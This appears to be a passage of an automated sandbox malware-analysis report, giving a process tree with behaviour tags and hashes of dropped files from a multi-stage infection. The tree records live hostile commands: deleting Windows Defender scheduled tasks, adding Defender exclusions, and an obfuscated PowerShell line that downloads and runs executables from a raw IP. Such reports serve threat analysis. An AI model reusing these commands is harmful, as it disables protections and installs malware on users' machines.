                                                          PID:4116
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                          11⤵
                                                            PID:2592
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                            11⤵
                                                              PID:4400
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                              11⤵
                                                                PID:4732
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                11⤵
                                                                  PID:2852
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:4596
                                                                • C:\Windows\system32\sc.exe
                                                                  sc delete ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:3456
                                                      • C:\Users\Admin\AppData\Local\Temp\10408160101\380b5de050.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408160101\380b5de050.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2364
                                                      • C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:2352
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3380
                                                      • C:\Users\Admin\AppData\Local\Temp\10408180101\d06d16d3ab.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408180101\d06d16d3ab.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3232
                                                      • C:\Users\Admin\AppData\Local\Temp\10408190101\1a3f3cec96.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408190101\1a3f3cec96.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Writes to the Master Boot Record (MBR)
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3736
                                                      • C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:112
                                                      • C:\Users\Admin\AppData\Local\Temp\10408210101\98f4bcf1c9.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408210101\98f4bcf1c9.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5968
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10408210101\98f4bcf1c9.exe"
                                                          7⤵
                                                          • Downloads MZ/PE file
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1744
                                                      • C:\Users\Admin\AppData\Local\Temp\10408220101\TbV75ZR.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10408220101\TbV75ZR.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5748
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                            PID:2964
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2788
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 492
                                                              8⤵
                                                              • Program crash
                                                              PID:6068
                                                        • C:\Users\Admin\AppData\Local\Temp\10408230101\h8NlU62.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10408230101\h8NlU62.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4540
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                              PID:1764
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5332
                                                          • C:\Users\Admin\AppData\Local\Temp\10408240101\qWR3lUj.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10408240101\qWR3lUj.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:112
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                                PID:3852
                                                            • C:\Users\Admin\AppData\Local\Temp\10408250101\c6496cb78f.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10408250101\c6496cb78f.exe"
                                                              6⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:540
                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10408250101\c6496cb78f.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6056
                                                            • C:\Users\Admin\AppData\Local\Temp\10408260101\XOPPRUc.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10408260101\XOPPRUc.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5092
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                7⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3936
                                                            • C:\Users\Admin\AppData\Local\Temp\10408270101\EPTwCQd.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10408270101\EPTwCQd.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:1588
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                7⤵
                                                                  PID:7072
                                                              • C:\Users\Admin\AppData\Local\Temp\10408280101\p3hx1_003.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10408280101\p3hx1_003.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:5696
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                  7⤵
                                                                    PID:4856
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:1764
                                                                  • C:\Windows\system32\svchost.exe
                                                                    "C:\Windows\system32\svchost.exe"
                                                                    7⤵
                                                                    • Downloads MZ/PE file
                                                                    • Adds Run key to start application
                                                                    PID:5964
                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:6092
                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                      8⤵
                                                                      • Deletes itself
                                                                      • Executes dropped EXE
                                                                      PID:5088
                                                                • C:\Users\Admin\AppData\Local\Temp\10408290101\7IIl2eE.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10408290101\7IIl2eE.exe"
                                                                  6⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Drops file in Windows directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5780
                                                                  • C:\Windows\SysWOW64\CMD.exe
                                                                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                    7⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1252
                                                                • C:\Users\Admin\AppData\Local\Temp\10408300101\Rm3cVPI.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10408300101\Rm3cVPI.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:13188
                                                                • C:\Users\Admin\AppData\Local\Temp\10408310101\NHq7LaU.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10408310101\NHq7LaU.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:6620
                                                                • C:\Users\Admin\AppData\Local\Temp\10408330101\de94793274.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10408330101\de94793274.exe"
                                                                  6⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:472
                                                      • C:\Windows\system32\msiexec.exe
                                                        C:\Windows\system32\msiexec.exe /V
                                                        1⤵
                                                        • Enumerates connected drives
                                                        • Drops file in Windows directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5236
                                                        • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                          "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3492
                                                          • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                            C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:2760
                                                            • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                              C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                              4⤵
                                                              • Checks computer location settings
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1448
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                5⤵
                                                                • Blocklisted process makes network request
                                                                • Downloads MZ/PE file
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1668
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\SysWOW64\cmd.exe
                                                              4⤵
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3860
                                                        • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:384
                                                          • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                            C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:3612
                                                            • C:\Windows\System32\cmd.exe
                                                              C:\Windows\System32\cmd.exe
                                                              4⤵
                                                                PID:4528
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\SysWOW64\cmd.exe
                                                                4⤵
                                                                • Drops file in Windows directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5936
                                                          • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3248
                                                            • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                              C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:2132
                                                              • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                4⤵
                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4128
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\SysWOW64\cmd.exe
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2284
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:6088
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2788 -ip 2788
                                                          1⤵
                                                            PID:5144
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1768 -ip 1768
                                                            1⤵
                                                              PID:3440
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBtAHAAcAByAEUAZgBFAHIARQBuAEMARQAgAC0AZQB4AGMAbAB1AHMASQBPAE4AUABBAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAEkAbgB2AGEAbABpAGQAXABIAGUAbABwAEwAaQBuAGsALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwBSAEMARQA7ACAAQQBEAGQALQBtAFAAUABSAGUARgBFAFIAZQBuAGMARQAgAC0AZQBYAEMAbABVAFMASQBvAG4AcABSAE8AQwBlAFMAUwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBJAG4AdgBhAGwAaQBkAFwASABlAGwAcABMAGkAbgBrAC4AZQB4AGUAIAAtAEYATwByAEMAZQA=
                                                              1⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:4640
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                              1⤵
                                                                PID:6540
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                1⤵
                                                                  PID:6588
                                                                • C:\ProgramData\SiteRocket Labs\Updater.exe
                                                                  "C:\ProgramData\SiteRocket Labs\Updater.exe" /u
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in System32 directory
                                                                  • Checks processor information in registry
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:5872
                                                                  • C:\Windows\TEMP\datC8C5.tmp\datC8C6.exe
                                                                    C:\Windows\TEMP\datC8C5.tmp\datC8C6.exe
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:208
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:5564
                                                                • C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                                  C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:12740

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Config.Msi\e586bd7.rbs

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  93d7d0022058ce5c2d9948c9599047ff

                                                                  SHA1

                                                                  562804349ed95f63c47923e40ef8faaedaf55777

                                                                  SHA256

                                                                  f9ef8b081ac96f8aec05aff8302ba94303fa6213a82cc997050624e5bbd2741e

                                                                  SHA512

                                                                  4994ab04ba17d34269c7a857ad9b4c79a034aa594ea81132b1de5fc9583b32842b231e41c07ac047b71a017227d8d347d1226521b61f99b065868723476898f0

                                                                • C:\Config.Msi\e586bdc.rbs

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  09b478ba8e840543938945395da6e5aa

                                                                  SHA1

                                                                  9704f66cb88cd048231f9f240cfe48799dc4e6eb

                                                                  SHA256

                                                                  6ea50b15574512fe0573819f0149080c47c1c3884e8a78c7ce8f0684be8896d3

                                                                  SHA512

                                                                  e331980d84857a2c54f531fca9bcc0cbccc0893019da519cc13b97e58bf13d385fd7af28ec7f9a0ed7a94ba33daf105676ef6e2813cddc7bdc8ac9ab5059905a

                                                                • C:\Config.Msi\e586be1.rbs

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  afce0603103efd48cf5ac0c38a745dad

                                                                  SHA1

                                                                  e78452967569187d4ee7430026915eba9c321023

                                                                  SHA256

                                                                  7d09216c5671a637df618de8295f474e2c9fe39f6ed254c2a116c6fa94b805fe

                                                                  SHA512

                                                                  0cf66deeb2a28c544fe1234af38f887497fa41647d9d54dc45f7227ee8b274b098e722a915f4c335b1d05828116e7492cc28f363f284653b21a090b3a65a96ff

                                                                • C:\Users\Admin\Abspawnhlp.exe

                                                                  Filesize

                                                                  27KB

                                                                  MD5

                                                                  5b8fb06983be9063ef128fa5aee80b3a

                                                                  SHA1

                                                                  c065a0ee84eb1fd646ea213bca20543306d7c9e1

                                                                  SHA256

                                                                  ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e

                                                                  SHA512

                                                                  868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  986ac17969db43bbe96e25fd2757d887

                                                                  SHA1

                                                                  884f4d389ea36b9ba62fd3553be15eaf444676c9

                                                                  SHA256

                                                                  2a782b9a023e9f4f71f8909d451bba96b4c623acb11215c86c188334318d9e42

                                                                  SHA512

                                                                  8bf1114dcaebdeecbe655af0a0d40643d872959c04ca2e8ac793183e35d0b85774c564ec135a941a5c9bbef52219d91db4141bf5a5a45b78bd9f08afdbbaaac0

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  99d2d513adeb4532b2898717af428b0a

                                                                  SHA1

                                                                  a715ed08c0ca03ee1347d22592c34a1982277182

                                                                  SHA256

                                                                  517fe0d8c0a7f932a839c12292113407f111d5224e5f54a06f2d03f56a375138

                                                                  SHA512

                                                                  50bd5f783b7d690c0573c66f403b1da2dd961625a41bfa7ca2316a214a5137218e3258d60f612f455a55cca834ed641f876b1d9f7609810484c95160a3bbaf7c

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                                                                  Filesize

                                                                  488B

                                                                  MD5

                                                                  fe6b762c99cbdb742d9f3026a9ba0890

                                                                  SHA1

                                                                  e22f9b792a3c9503435557caa5027acdf92916a7

                                                                  SHA256

                                                                  901c920ce816c5140d6718b79bda23c757051f7abc3211c05e0e3dd84acba68c

                                                                  SHA512

                                                                  82985b0833e6ec4a1d9d24cb27ba07a5cb4b75e7860f3e3a7aa0434263a242c454848993e46008fcc32cd1c1f30ffe1abc05cdf2af3889e7c506d867d80a80ad

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                                  Filesize

                                                                  482B

                                                                  MD5

                                                                  eaf61707ca3f30e8ce4bbb8b7846e341

                                                                  SHA1

                                                                  2029b65dc33b88bf02422bc320478f0e53539a74

                                                                  SHA256

                                                                  ed81612e73f5bed1328ea12607d168e9afea4afa021c38f4df0b640107cd32ab

                                                                  SHA512

                                                                  98716f0b6b6c5fe0edc0e0554877e27252167294b7fe9e57c37d7f4f512bae5972a842ea0e2fcd71a2d7e52c5d2e89541327c921bae6343c6e1d385320251a35

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IUD94ZRE\service[1].htm

                                                                  Filesize

                                                                  1B

                                                                  MD5

                                                                  cfcd208495d565ef66e7dff9f98764da

                                                                  SHA1

                                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                  SHA256

                                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                  SHA512

                                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                • C:\Users\Admin\AppData\Local\TempRP1EAB3C6HYGL92EWTAX25TPCXPUV32K.EXE

                                                                  Filesize

                                                                  1.8MB

                                                                  MD5

                                                                  0830f37499cc32085cc547d9005b17a0

                                                                  SHA1

                                                                  5c19017d9ad04c91953ee7f1535279d5aa237b33

                                                                  SHA256

                                                                  bbcd80468240fa20c60ab65f34c8b9641a8c0b394d04cf484bbe97885613006f

                                                                  SHA512

                                                                  3f9c5d02880dadd96ac073fbc980f7f6d00ed2466e33a8fc70d9dbf4c8d1f3004c0390e24af5e6ff08b1da8a77aea847177f9271f6186a0cf7b1e9d552d858df

                                                                • C:\Users\Admin\AppData\Local\Temp\059524102104

                                                                  Filesize

                                                                  83KB

                                                                  MD5

                                                                  0b8031ae30017c244e8ab4a3415ac1cb

                                                                  SHA1

                                                                  43e2b4c38e0cd04ff11daeeb1ae2e3f0b54c18bc

                                                                  SHA256

                                                                  cfa83c17f947a3ffbcdb4c96bc055557eaf2a851e4e8ba447dba26539d5ae13c

                                                                  SHA512

                                                                  e78b1a3fa5547a309b87a45f2d22d243da23c6ece6025d610159edee41e63c6782e64c5897fe2e65f1ec4c5bc11d6e356fea18cd8326bcdecc02b2c4f3fa5677

                                                                • C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi

                                                                  Filesize

                                                                  2.0MB

                                                                  MD5

                                                                  869e91e568e087f0bb5b83316615fe25

                                                                  SHA1

                                                                  d270c43ad104cecf8ac3c147ec9d38a26f690598

                                                                  SHA256

                                                                  2a776b45f044c0a4be9027f33b1548bfd78890db0b5c49dcb36026b0bf15a243

                                                                  SHA512

                                                                  e394d8e21ba720d962d55c2a55331c491583dba4d168a26335593ea4f279899fbcb4c39f43938c3ce22dfeda16b8685368b6f3398d5975ad7279314fd27018a6

                                                                • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe

                                                                  Filesize

                                                                  61KB

                                                                  MD5

                                                                  c7274a9e48f874a8c2d8c402d60cdf4d

                                                                  SHA1

                                                                  f9fce7ca9c4e9c5a0f8ed7fe812506809bb6f85b

                                                                  SHA256

                                                                  83577ba8c993c338671786fd5692e53080c87b9670ee8fda9cb163b689eb4ff9

                                                                  SHA512

                                                                  590bf5c61ed77540690a04b3b35bbaa1e996b911a00b638e866b6af82745b09877be76def1abcf05a8c4e9eb9ffdc34447860e628de9d518623c76eb493a9c61

